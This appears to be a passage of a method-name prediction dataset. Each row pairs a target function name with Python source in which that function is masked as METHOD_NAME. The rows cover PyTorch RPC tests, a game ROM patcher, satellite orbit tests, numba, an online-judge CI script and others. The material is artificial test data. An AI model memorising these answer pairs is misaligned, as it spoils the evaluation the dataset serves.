"first_kwarg": torch.tensor([2, 2]),
"second_kwarg": torch.tensor([3, 3]),
}
expected_error = self.get_timeout_error_regex()
fut = rpc_async_call_with_timeout_future_ret(dst_worker_name, args, kwargs, 0.5)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure timeout if we don't specify but the default is less than the
# RPC takes to execute.
rpc._set_rpc_timeout(0.001)
fut = rpc_async_call_future_ret(dst_worker_name, args, kwargs)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if zero timeout is specified
fut = rpc_async_call_with_timeout_future_ret(dst_worker_name, args, kwargs, 0)
result = fut.wait()
self.assertEqual(result, torch.tensor([8, 8]))
# reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def METHOD_NAME(self):
# Test that calling to_here() in JIT will raise timeout error if
# rpc.remote failed.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = f"worker{dst_rank}"
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
# Will ensure error handling callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Call to_here() within a ScriptFunction and ensure it raises
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref_to_here(rref)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout_in_jit(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = f"worker{dst_rank}"
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref_to_here_with_timeout(rref, 0.01)
rref_to_here_with_timeout(rref, 100)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_rref_timeout_pickle_in_jit(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = f"worker{dst_rank}"
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
# Will ensure error handling callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Call RPC with RRef arg in JIT, which will go through JIT pickling and
# ensure error is raised.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc_async_with_rref_arg(dst_worker, (rref, ))
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_rref_timeout_pickle_script_func(self):
# Similar to above test, but calls python rpc with script function.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = f"worker{dst_rank}"
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
# Will ensure error handling callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Call RPC with script function that takes RRef, ensure timeout during pickling
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_sync(dst_worker, rref_to_here, args=(rref, )) | null |
upgrade marin | from ..assembler import ASM
def METHOD_NAME(rom):
# Show marin outside, even without a sword.
rom.patch(0x05, 0x0E78, ASM("ld a, [$DB4E]"), ASM("ld a, $01"), fill_nop=True)
# Make marin ignore the fact that you did not save the tarin yet, and allowing getting her song
rom.patch(0x05, 0x0E87, ASM("ld a, [$D808]"), ASM("ld a, $10"), fill_nop=True)
rom.patch(0x05, 0x0F73, ASM("ld a, [$D808]"), ASM("ld a, $10"), fill_nop=True)
rom.patch(0x05, 0x0FB0, ASM("ld a, [$DB48]"), ASM("ld a, $01"), fill_nop=True)
# Show marin in the animal village
rom.patch(0x03, 0x0A86, ASM("ld a, [$DB74]"), ASM("ld a, $01"), fill_nop=True)
rom.patch(0x05, 0x3F2E, ASM("ld a, [$DB74]"), ASM("ld a, $01"), fill_nop=True) # animal d0
rom.patch(0x15, 0x3F96, ASM("ld a, [$DB74]"), ASM("ld a, $01"), fill_nop=True) # animal d1
rom.patch(0x18, 0x11B0, ASM("ld a, [$DB74]"), ASM("ld a, $01"), fill_nop=True) # animal d2
# Instead of checking if we have the ballad, check if we have a specific room flag set
rom.patch(0x05, 0x0F89, ASM("""
ld a, [$DB49]
and $04
"""), ASM("""
ld a, [$D892]
and $10
"""), fill_nop=True)
rom.patch(0x05, 0x0FDF, ASM("""
ld a, [$DB49]
and $04
"""), ASM("""
ld a, [$D892]
and $10
"""), fill_nop=True)
rom.patch(0x05, 0x1042, ASM("""
ld a, [$DB49]
and $04
"""), ASM("""
ld a, [$D892]
and $10
"""), fill_nop=True)
# Patch that we call our specific handler instead of giving the song
rom.patch(0x05, 0x1170, ASM("""
ld hl, $DB49
set 2, [hl]
xor a
ld [$DB4A], a
"""), ASM("""
; Mark Marin as done.
ld a, [$D892]
or $10
ld [$D892], a
"""), fill_nop=True)
# Show the right item instead of the ocerina
rom.patch(0x05, 0x11B3, ASM("""
ld de, $515F
xor a
ldh [$F1], a
jp $3C77
"""), ASM("""
ld a, $0C
rst 8
ret
"""), fill_nop=True)
# Patch the message that tells we got the song, to give the item and show the right message
rom.patch(0x05, 0x119C, ASM("""
ld a, $13
call $2385
"""), ASM("""
ld a, $0E
rst 8
"""), fill_nop=True)
def upgradeManbo(rom):
# Instead of checking if we have the song, check if we have a specific room flag set
rom.patch(0x18, 0x0536, ASM("""
ld a, [$DB49]
and $02
"""), ASM("""
ld a, [$DAFD]
and $20
"""), fill_nop=True)
# Show the right item instead of the ocerina
rom.patch(0x18, 0x0786, ASM("""
ld de, $474D
xor a
ldh [$F1], a
jp $3C77
"""), ASM("""
ld a, $0C
rst 8
ret
"""), fill_nop=True)
# Patch to replace song giving to give the right item
rom.patch(0x18, 0x0757, ASM("""
ld a, $01
ld [$DB4A], a
ld hl, $DB49
set 1, [hl]
"""), ASM("""
; Mark Manbo as done.
ld hl, $DAFD
set 5, [hl]
; Show item message and give item
ld a, $0E
rst 8
"""), fill_nop=True)
# Remove the normal "got song message")
rom.patch(0x18, 0x076F, 0x0774, "", fill_nop=True)
def upgradeMamu(rom):
# Always allow the sign maze instead of only allowing the sign maze if you do not have song3
rom.patch(0x00, 0x2057, ASM("ld a, [$DB49]"), ASM("ld a, $00"), fill_nop=True)
# Patch the condition at which Mamu gives you the option to listen to him
rom.patch(0x18, 0x0031, ASM("""
ld a, [$DB49]
and $01
"""), ASM("""
ld a, [$DAFB] ; load room flag of the Mamu room
and $10
"""), fill_nop=True)
# Show the right item instead of the ocerina
rom.patch(0x18, 0x0299, ASM("""
ld de, $474D
xor a
ldh [$F1], a
call $3C77
"""), ASM("""
ld a, $0C
rst 8
"""), fill_nop=True)
# Patch given an item
rom.patch(0x18, 0x0270, ASM("""
ld a, $02
ld [$DB4A], a
ld hl, $DB49
set 0, [hl]
"""), ASM("""
; Set the room complete flag.
ld hl, $DAFB
set 4, [hl]
"""), fill_nop=True)
# Patch to show the right message for the item
rom.patch(0x18, 0x0282, ASM("""
ld a, $DF
call $4087
"""), ASM("""
; Give item and message for room.
ld a, $0E
rst 8
"""), fill_nop=True) | null |
test read txt file | import datetime
import numpy as np
import RAiDER
from RAiDER.losreader import (
read_ESA_Orbit_file,
read_txt_file,
cut_times,
inc_hd_to_enu,
get_sv,
getZenithLookVecs,
Conventional,
Zenith,
)
from test import *
@pytest.fixture
def svs():
T = [
datetime.datetime(2018, 11, 12, 23, 0, 2),
datetime.datetime(2018, 11, 12, 23, 0, 12),
datetime.datetime(2018, 11, 12, 23, 0, 22),
datetime.datetime(2018, 11, 12, 23, 0, 32),
datetime.datetime(2018, 11, 12, 23, 0, 42),
datetime.datetime(2018, 11, 12, 23, 0, 52),
datetime.datetime(2018, 11, 12, 23, 1, 2),
datetime.datetime(2018, 11, 12, 23, 1, 12),
]
x = np.array([
-2064965.285362,
-2056228.553736,
-2047224.526705,
-2037955.293282,
-2028422.977002,
-2018629.735564,
-2008577.760461,
-1998269.276601,
])
y = np.array([
6434865.494987,
6460407.492520,
6485212.031660,
6509275.946120,
6532596.156540,
6555169.670917,
6576993.585012,
6598065.082739,
])
z = np.array([
2090670.967443,
2019650.417312,
1948401.684024,
1876932.818066,
1805251.894958,
1733367.014327,
1661286.298987,
1589017.893976,
])
vx = np.array([
860.239634,
887.072466,
913.698134,
940.113169,
966.314136,
992.297636,
1018.060311,
1043.598837,
])
vy = np.array([
2590.964968,
2517.380329,
2443.474728,
2369.256838,
2294.735374,
2219.919093,
2144.816789,
2069.437298,
])
vz = np.array([
-7090.378144,
-7113.598127,
-7136.014344,
-7157.624244,
-7178.425371,
-7198.415359,
-7217.591940,
-7235.952940,
])
return [T, x, y, z, vx, vy, vz]
def test_read_ESA_Orbit_file(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'S1_orbit_example.EOF')
svs = read_ESA_Orbit_file(filename)
assert [np.allclose(
[(x-y).total_seconds() for x, y in zip(svs[0], true_svs[0])],
np.zeros(len(svs[0]))
)]
assert [np.allclose(s, ts) for s, ts in zip(svs[1:], true_svs[1:])]
def METHOD_NAME(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'S1_sv_file.txt')
svs = read_txt_file(filename)
assert [np.allclose(
[(x-y).total_seconds() for x, y in zip(svs[0], true_svs[0])],
np.zeros(len(svs[0]))
)]
assert [np.allclose(s, ts) for s, ts in zip(svs[1:], true_svs[1:])]
def test_get_sv_1(svs, mocker):
true_svs = svs
filename = os.path.join(ORB_DIR, 'S1_orbit_example.EOF')
# Ensures non-stardard file-name for orbit xml is not filtered out
mocker.patch('RAiDER.losreader.filter_ESA_orbit_file', side_effects=[True])
svs = get_sv(filename, true_svs[0][0], pad=3*60)
assert [np.allclose(
[(x-y).total_seconds() for x, y in zip(svs[0], true_svs[0])],
np.zeros(len(svs[0]))
)]
assert [np.allclose(s, ts) for s, ts in zip(svs[1:], true_svs[1:])]
assert RAiDER.losreader.filter_ESA_orbit_file.call_count == 1
def test_get_sv_2(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'S1_sv_file.txt')
svs = get_sv(filename, true_svs[0][0], pad=3*60)
assert [np.allclose(
[(x-y).total_seconds() for x, y in zip(svs[0], true_svs[0])],
np.zeros(len(svs[0]))
)]
assert [np.allclose(s, ts) for s, ts in zip(svs[1:], true_svs[1:])]
def test_get_sv_3(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'incorrect_file.txt')
with pytest.raises(ValueError):
get_sv(filename, true_svs[0][0], pad=3*60)
def test_get_sv_4(svs):
true_svs = svs
filename = os.path.join(ORB_DIR, 'no_exist.txt')
with pytest.raises(FileNotFoundError):
get_sv(filename, true_svs[0][0], pad=3*60)
def test_cut_times(svs):
true_svs = svs
assert all(cut_times(true_svs[0], true_svs[0][0], pad=3600*3))
def test_cut_times_2(svs):
true_svs = svs
assert sum(cut_times(true_svs[0], true_svs[0][0], pad=5)) == 1
def test_cut_times_3(svs):
true_svs = svs
assert np.sum(cut_times(true_svs[0], true_svs[0][4], pad=15)) == 3
def test_cut_times_4(svs):
true_svs = svs
assert np.sum(cut_times(true_svs[0], true_svs[0][0], pad=400)) == len(true_svs[0])
def test_los_to_lv():
with pytest.raises(ValueError):
inc_hd_to_enu(-10, 0)
def test_los_to_lv_2():
assert np.allclose(
inc_hd_to_enu(0, 0),
np.array([0, 0, 1])
)
def test_los_to_lv_3():
assert np.allclose(
inc_hd_to_enu(0, -180),
np.array([0, 0, 1])
)
def test_los_to_lv_3b():
assert np.allclose(
inc_hd_to_enu(0, 18),
np.array([0, 0, 1])
)
def test_los_to_lv_3c():
assert np.allclose(
inc_hd_to_enu(0, -18),
np.array([0, 0, 1])
)
def test_los_to_lv_4():
assert np.allclose(
inc_hd_to_enu(35, 0),
np.array([0, np.sin(np.radians(35)), np.cos(np.radians(35))])
)
def test_los_to_lv_5():
assert np.allclose(
inc_hd_to_enu(35, 180),
np.array([0, -np.sin(np.radians(35)), np.cos(np.radians(35))])
)
def test_los_to_lv_6():
assert np.allclose(
inc_hd_to_enu(35, 90),
np.array([-np.sin(np.radians(35)), 0, np.cos(np.radians(35))])
)
def test_zenith_1():
assert np.allclose(
getZenithLookVecs(np.array([0]), np.array([0]), np.array([0])),
np.array([1, 0, 0])
)
def test_zenith_2():
assert np.allclose(
getZenithLookVecs(np.array([90]), np.array([0]), np.array([0])),
np.array([0, 0, 1])
)
def test_zenith_3():
assert np.allclose(
getZenithLookVecs(np.array([-90]), np.array([0]), np.array([0])),
np.array([0, 0, -1])
)
def test_zenith_4():
assert np.allclose(
getZenithLookVecs(np.array([0]), np.array([180]), np.array([0])),
np.array([-1, 0, 0])
)
def test_zenith_5():
assert np.allclose(
getZenithLookVecs(np.array([0]), np.array([90]), np.array([0])),
np.array([0, 1, 0])
)
def test_zenith_6():
assert np.allclose(
getZenithLookVecs(np.array([0]), np.array([0]), np.array([1000])),
np.array([1, 0, 0])
)
def test_Zenith():
lats = np.array([-90, 0, 0, 90])
lons = np.array([-90, 0, 90, 180])
hgts = np.array([-10, 0, 10, 1000])
unit_vecs = np.array([[0,0,-1], [1,0,0], [0,1,0], [0,0,1]])
z = Zenith()
with pytest.raises(RuntimeError):
z.setPoints(lats=None)
z.setPoints(lats=lats, lons=lons, heights = hgts)
assert z._lats.shape == (4,)
assert z._lats.shape == z._lons.shape
assert np.allclose(z._heights, hgts)
output = z(unit_vecs)
assert output.shape == (4,3)
assert np.allclose(output, unit_vecs)
def test_Conventional():
lats = np.array([-90, 0, 0, 90])
lons = np.array([-90, 0, 90, 180])
hgts = np.array([-10, 0, 10, 1000])
c = Conventional()
with pytest.raises(ValueError):
c(np.ones(4))
c.setPoints(lats, lons, hgts)
with pytest.raises(ValueError):
c(np.ones(4)) | null |
test infer | # Copyright 2020-2023 OpenDR European Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import gc
import cv2
import shutil
import numpy as np
from opendr.perception.object_detection_2d import RetinaFaceLearner
from opendr.perception.object_detection_2d import WiderFaceDataset
import os
device = os.getenv('TEST_DEVICE') if os.getenv('TEST_DEVICE') else 'cpu'
def rmfile(path):
try:
os.remove(path)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
def rmdir(_dir):
try:
shutil.rmtree(_dir)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
class TestRetinaFaceLearner(unittest.TestCase):
@classmethod
def setUpClass(cls):
print("\n\n**********************************\nTEST RetinaFace Learner\n"
"**********************************")
cls.temp_dir = os.path.join("", "tests", "sources", "tools", "perception", "object_detection_2d",
"retinaface", "retinaface_temp")
cls.detector = RetinaFaceLearner(device=device, temp_path=cls.temp_dir, batch_size=1, epochs=1,
checkpoint_after_iter=0, lr=1e-4)
# Download all required files for testing
cls.detector.download(mode="pretrained")
cls.detector.download(mode="images")
cls.detector.download(mode="test_data")
@classmethod
def tearDownClass(cls):
print('Removing temporary directories for RetinaFace...')
# Clean up downloaded files
rmfile(os.path.join(cls.temp_dir, "cov4.jpg"))
rmdir(os.path.join(cls.temp_dir, "retinaface_resnet"))
rmdir(os.path.join(cls.temp_dir))
del cls.detector
gc.collect()
print('Finished cleaning for RetinaFace...')
def test_fit(self):
print('Starting training test for RetinaFace...')
training_dataset = WiderFaceDataset(root=self.temp_dir, splits=['train'])
m = list(self.detector._model.get_params()[0].values())[0].asnumpy().copy()
self.detector.fit(dataset=training_dataset, silent=True)
n = list(self.detector._model.get_params()[0].values())[0].asnumpy()
self.assertFalse(np.array_equal(m, n),
msg="Model parameters did not change after running fit.")
del training_dataset, m, n
gc.collect()
print('Finished training test for RetinaFace...')
def test_eval(self):
print('Starting evaluation test for RetinaFace...')
eval_dataset = WiderFaceDataset(root=self.temp_dir, splits=['train'])
self.detector.load(os.path.join(self.temp_dir, "retinaface_resnet"))
results_dict = self.detector.eval(eval_dataset, flip=False, pyramid=False)
self.assertIsNotNone(results_dict['recall'],
msg="Eval results dictionary not returned.")
del eval_dataset, results_dict
gc.collect()
print('Finished evaluation test for RetinaFace...')
def METHOD_NAME(self):
print('Starting inference test for RetinaFace...')
self.detector.load(os.path.join(self.temp_dir, "retinaface_resnet"))
img = cv2.imread(os.path.join(self.temp_dir, "cov4.jpg"))
self.assertIsNotNone(self.detector.infer(img),
msg="Returned empty BoundinBoxList.")
del img
gc.collect()
print('Finished inference test for RetinaFace...')
def test_save_load(self):
print('Starting save/load test for RetinaFace...')
self.detector.save(os.path.join(self.temp_dir, "test_model"))
self.detector._model = None
self.detector.load(os.path.join(self.temp_dir, "test_model"))
self.assertIsNotNone(self.detector._model, "model is None after loading model.")
# Cleanup
rmdir(os.path.join(self.temp_dir, "test_model"))
print('Finished save/load test for RetinaFace...')
if __name__ == "__main__":
unittest.main() | null |
test call functions | import numpy as np
from numba.core import types
from numba.cuda.testing import skip_on_cudasim, unittest, CUDATestCase
from numba import cuda
from numba.cuda import libdevice, compile_ptx
from numba.cuda.libdevicefuncs import functions, create_signature
def use_sincos(s, c, x):
i = cuda.grid(1)
if i < len(x):
sr, cr = libdevice.sincos(x[i])
s[i] = sr
c[i] = cr
def use_frexp(frac, exp, x):
i = cuda.grid(1)
if i < len(x):
fracr, expr = libdevice.frexp(x[i])
frac[i] = fracr
exp[i] = expr
def use_sad(r, x, y, z):
i = cuda.grid(1)
if i < len(x):
r[i] = libdevice.sad(x[i], y[i], z[i])
@skip_on_cudasim('Libdevice functions are not supported on cudasim')
class TestLibdevice(CUDATestCase):
"""
Some tests of libdevice function wrappers that check the returned values.
These are mainly to check that the generation of the implementations
results in correct typing and lowering for each type of function return
(e.g. scalar return, UniTuple return, Tuple return, etc.).
"""
def test_sincos(self):
# Tests return of a UniTuple from a libdevice function
arr = np.arange(100, dtype=np.float64)
sres = np.zeros_like(arr)
cres = np.zeros_like(arr)
cufunc = cuda.jit(use_sincos)
cufunc[4, 32](sres, cres, arr)
np.testing.assert_allclose(np.cos(arr), cres)
np.testing.assert_allclose(np.sin(arr), sres)
def test_frexp(self):
# Test return of a Tuple from a libdevice function
arr = np.linspace(start=1.0, stop=10.0, num=100, dtype=np.float64)
fracres = np.zeros_like(arr)
expres = np.zeros(shape=arr.shape, dtype=np.int32)
cufunc = cuda.jit(use_frexp)
cufunc[4, 32](fracres, expres, arr)
frac_expect, exp_expect = np.frexp(arr)
np.testing.assert_array_equal(frac_expect, fracres)
np.testing.assert_array_equal(exp_expect, expres)
def test_sad(self):
# Test return of a scalar from a libdevice function
x = np.arange(0, 200, 2)
y = np.arange(50, 150)
z = np.arange(15, 115)
r = np.zeros_like(x)
cufunc = cuda.jit(use_sad)
cufunc[4, 32](r, x, y, z)
np.testing.assert_array_equal(np.abs(x - y) + z, r)
# A template for generating tests of compiling calls to libdevice functions.
# The purpose of the call and assignment of the return variables is to ensure
# the actual function implementations are not thrown away resulting in a PTX
# implementation that only contains the ret instruction - this may hide certain
# errors.
function_template = """\
from numba.cuda import libdevice
def pyfunc(%(pyargs)s):
ret = libdevice.%(func)s(%(funcargs)s)
%(retvars)s = ret
"""
def make_test_call(libname):
"""
Generates a test function for each libdevice function.
"""
def METHOD_NAME(self):
# Strip off '__nv_' from libdevice name to get Python name
apiname = libname[5:]
apifunc = getattr(libdevice, apiname)
retty, args = functions[libname]
sig = create_signature(retty, args)
# Construct arguments to the libdevice function. These are all
# non-pointer arguments to the underlying bitcode function.
funcargs = ", ".join(['a%d' % i for i, arg in enumerate(args) if not
arg.is_ptr])
# Arguments to the Python function (`pyfunc` in the template above) are
# the arguments to the libdevice function, plus as many extra arguments
# as there are in the return type of the libdevice function - one for
# scalar-valued returns, or the length of the tuple for tuple-valued
# returns.
if isinstance(sig.return_type, (types.Tuple, types.UniTuple)):
# Start with the parameters for the return values
pyargs = ", ".join(['r%d' % i for i in
range(len(sig.return_type))])
# Add the parameters for the argument values
pyargs += ", " + funcargs
# Generate the unpacking of the return value from the libdevice
# function into the Python function return values (`r0`, `r1`,
# etc.).
retvars = ", ".join(['r%d[0]' % i for i in
range(len(sig.return_type))])
else:
# Scalar return is a more straightforward case
pyargs = "r0, " + funcargs
retvars = "r0[0]"
# Create the string containing the function to compile
d = { 'func': apiname,
'pyargs': pyargs,
'funcargs': funcargs,
'retvars': retvars }
code = function_template % d
# Convert the string to a Python function
locals = {}
exec(code, globals(), locals)
pyfunc = locals['pyfunc']
# Compute the signature for compilation. This mirrors the creation of
# arguments to the Python function above.
pyargs = [ arg.ty for arg in args if not arg.is_ptr ]
if isinstance(sig.return_type, (types.Tuple, types.UniTuple)):
pyreturns = [ret[::1] for ret in sig.return_type]
pyargs = pyreturns + pyargs
else:
pyargs.insert(0, sig.return_type[::1])
pyargs = tuple(pyargs)
ptx, resty = compile_ptx(pyfunc, pyargs)
# If the function body was discarded by optimization (therefore making
# the test a bit weak), there won't be any loading of parameters -
# ensure that a load from parameters occurs somewhere in the PTX
self.assertIn('ld.param', ptx)
# Returning the result (through a passed-in array) should also require
# a store to global memory, so check for at least one of those too.
self.assertIn('st.global', ptx)
return METHOD_NAME
@skip_on_cudasim('Compilation to PTX is not supported on cudasim')
class TestLibdeviceCompilation(unittest.TestCase):
"""
Class for holding all tests of compiling calls to libdevice functions. We
generate the actual tests in this class (as opposed to using subTest and
one test within this class) because there are a lot of tests, and it makes
the test suite appear frozen to test them all as subTests in one test.
"""
for libname in functions:
setattr(TestLibdeviceCompilation, 'test_%s' % libname,
make_test_call(libname))
if __name__ == '__main__':
unittest.main() | null |
compile test | import os
import sys
import subprocess
import argparse
from bs4 import BeautifulSoup as bs
import requests
EXTENSION = [("py", "python", "main"), ("cpp", "cpp", "main"), ("java", "java", "Main")]
def run(command):
ret = subprocess.check_output(command, shell=True).decode('utf8')
return ret
def load_arg():
parser = argparse.ArgumentParser()
arg = parser.add_argument
arg('--pr_number', type=int, help="Pull Request Number")
arg('--check_solution', action='store_true')
parser.set_defaults(check_solution=False)
return parser.parse_args()
def check_alreay_exist_solution(path):
if os.path.exists(path):
raise Exception("Alread Exists Solution")
print("It is a new Solution!!")
def get_pr_file(pr_number):
run(f"git fetch origin +refs/pull/{pr_number}/merge")
files = run(f"git --no-pager diff --name-only FETCH_HEAD $(git merge-base FETCH_HEAD main)")
files = [file.strip() for file in files.split() if file.strip() != ""]
if len(files) != 1:
raise Exception("No 1 PR 1 Solution")
return files[0]
def get_solution_language(path):
filename, extension = path.split('/')[-1].split('.')
for info in EXTENSION:
if info[0] == extension:
if filename == info[2]:
print(f"Found {info[1]} Language")
return info[1]
else:
raise Exception(f"Wrong File name {filename}")
raise Exception(f"No Found {extension} Language")
def detect_tab(path):
with open(path, 'r') as f:
solution = f.readlines()
f.close()
for line in solution:
if '\t' in line:
raise Exception("Detected Tab in this solution")
print("No Detect Tab")
def get_example(problem_id):
url = f"https://www.acmicpc.net/problem/{problem_id}"
req = requests.get(url)
html = bs(req.text, 'html.parser')
spj = True if html.find('span', 'problem-label-spj') else False
if spj:
print("Found Special Judge")
examples = []
try:
sample_id = 1
while True:
sample_input = html.select(f'#sample-input-{sample_id}')[0].text
sample_output = html.select(f'#sample-output-{sample_id}')[0].text
examples.append((sample_input, sample_output))
sample_id += 1
except:
pass
return spj, examples
def METHOD_NAME(path):
try:
extension = get_solution_language(path)
if extension == 'cpp':
run(f"g++ -std=c++17 {path} -o Main")
elif extension == 'java':
run(f"javac {path} -d .")
except:
raise RuntimeError("Compile Error")
return extension
def judge_test(path):
detect_tab(path)
problem = path.split('/')[-2]
spj, samples = get_example(problem)
extension = METHOD_NAME(path)
print(f"Found {len(samples)} examples in {problem} problem")
for idx, (data_input, data_output) in enumerate(samples):
with open("example.in", 'w') as f:
f.write(data_input)
f.close()
try:
if extension == 'cpp':
result = run(f"./Main < example.in")
elif extension == 'python':
result = run(f"python3 {path} < example.in")
elif extension == 'java':
result = run(f"java Main < example.in")
except:
raise Exception("Runtime Error")
if spj:
continue
result = [ line.strip() for line in result if line.strip() != '']
data_output = [ line.strip() for line in data_output if line.strip() != '' ]
if result != data_output:
raise Exception("Wrong Solution")
print(f"Example {idx + 1} Correct !")
print(f"{problem} Judge Success")
if __name__ == "__main__":
args = load_arg()
if args.check_solution:
file = get_pr_file(args.pr_number)
lang = get_solution_language(file)
with open("result", 'w') as f:
f.write(lang)
f.close()
else:
file = get_pr_file(args.pr_number)
check_alreay_exist_solution(file)
run(f"git checkout FETCH_HEAD")
judge_test(file) | null |
resource pathname | """macresource - Locate and open the resources needed for a script."""
from warnings import warnpy3k
warnpy3k("In 3.x, the macresource module is removed.", stacklevel=2)
from Carbon import Res
import os
import sys
import MacOS
import macostools
class ArgumentError(TypeError): pass
class ResourceFileNotFoundError(ImportError): pass
def need(restype, resid, filename=None, modname=None):
"""Open a resource file, if needed. restype and resid
are required parameters, and identify the resource for which to test. If it
is available we are done. If it is not available we look for a file filename
(default: modname with .rsrc appended) either in the same folder as
where modname was loaded from, or otherwise across sys.path.
Returns the refno of the resource file opened (or None)"""
if modname is None and filename is None:
raise ArgumentError, "Either filename or modname argument (or both) must be given"
if type(resid) is type(1):
try:
h = Res.GetResource(restype, resid)
except Res.Error:
pass
else:
return None
else:
try:
h = Res.GetNamedResource(restype, resid)
except Res.Error:
pass
else:
return None
# Construct a filename if we don't have one
if not filename:
if '.' in modname:
filename = modname.split('.')[-1] + '.rsrc'
else:
filename = modname + '.rsrc'
# Now create a list of folders to search
searchdirs = []
if modname == '__main__':
# If we're main we look in the current directory
searchdirs = [os.curdir]
if modname in sys.modules:
mod = sys.modules[modname]
if hasattr(mod, '__file__'):
searchdirs = [os.path.dirname(mod.__file__)]
searchdirs.extend(sys.path)
# And look for the file
for dir in searchdirs:
pathname = os.path.join(dir, filename)
if os.path.exists(pathname):
break
else:
raise ResourceFileNotFoundError, filename
refno = open_pathname(pathname)
# And check that the resource exists now
if type(resid) is type(1):
h = Res.GetResource(restype, resid)
else:
h = Res.GetNamedResource(restype, resid)
return refno
def open_pathname(pathname, verbose=0):
"""Open a resource file given by pathname, possibly decoding an
AppleSingle file"""
# No resource fork. We may be on OSX, and this may be either
# a data-fork based resource file or an AppleSingle file
# from the CVS repository.
try:
refno = Res.FSOpenResourceFile(pathname, u'', 1)
except Res.Error, arg:
if arg[0] != -199:
# -199 is "bad resource map"
raise
else:
return refno
# Finally try decoding an AppleSingle file
pathname = _decode(pathname, verbose=verbose)
refno = Res.FSOpenResourceFile(pathname, u'', 1)
def METHOD_NAME(pathname, verbose=0):
"""Return the pathname for a resource file (either DF or RF based).
If the pathname given already refers to such a file simply return it,
otherwise first decode it."""
# No resource fork. We may be on OSX, and this may be either
# a data-fork based resource file or an AppleSingle file
# from the CVS repository.
try:
refno = Res.FSOpenResourceFile(pathname, u'', 1)
except Res.Error, arg:
if arg[0] != -199:
# -199 is "bad resource map"
raise
else:
return refno
# Finally try decoding an AppleSingle file
pathname = _decode(pathname, verbose=verbose)
return pathname
def open_error_resource():
"""Open the resource file containing the error code to error message
mapping."""
need('Estr', 1, filename="errors.rsrc", modname=__name__)
def _decode(pathname, verbose=0):
# Decode an AppleSingle resource file, return the new pathname.
newpathname = pathname + '.df.rsrc'
if os.path.exists(newpathname) and \
os.stat(newpathname).st_mtime >= os.stat(pathname).st_mtime:
return newpathname
if hasattr(os, 'access') and not \
os.access(os.path.dirname(pathname), os.W_OK|os.X_OK):
# The destination directory isn't writeable. Create the file in
# a temporary directory
import tempfile
fd, newpathname = tempfile.mkstemp(".rsrc")
if verbose:
print 'Decoding', pathname, 'to', newpathname
import applesingle
applesingle.decode(pathname, newpathname, resonly=1)
return newpathname | null |
test edit record | # -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2017 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
# or submit itself to any jurisdiction.
"""Integration tests for record edit."""
###########################################
# api/deposits/{pid}/actions/edit [POST]
###########################################
def test_edit_record_owner_can_edit(client, users, auth_headers_for_user,
create_deposit):
owner = users['cms_user']
pid = create_deposit(owner, 'test', publish=True)['_deposit']['id']
resp = client.post('/deposits/{}/actions/edit'.format(pid),
headers=auth_headers_for_user(owner))
assert resp.status_code == 201
def test_edit_record_superuser_can_edit(client, users,
auth_headers_for_superuser,
create_deposit):
owner = users['cms_user']
pid = create_deposit(owner, 'test', publish=True)['_deposit']['id']
resp = client.post('/deposits/{}/actions/edit'.format(pid),
headers=auth_headers_for_superuser)
assert resp.status_code == 201
def test_edit_record_when_other_user_403(client, users, auth_headers_for_user,
create_deposit):
owner, other_user = users['cms_user'], users['cms_user2']
pid = create_deposit(owner, 'test', publish=True)['_deposit']['id']
resp = client.post('/deposits/{}/actions/edit'.format(pid),
headers=auth_headers_for_user(other_user))
assert resp.status_code == 403
def METHOD_NAME(client, create_deposit, users, auth_headers_for_superuser):
owner = users['cms_user']
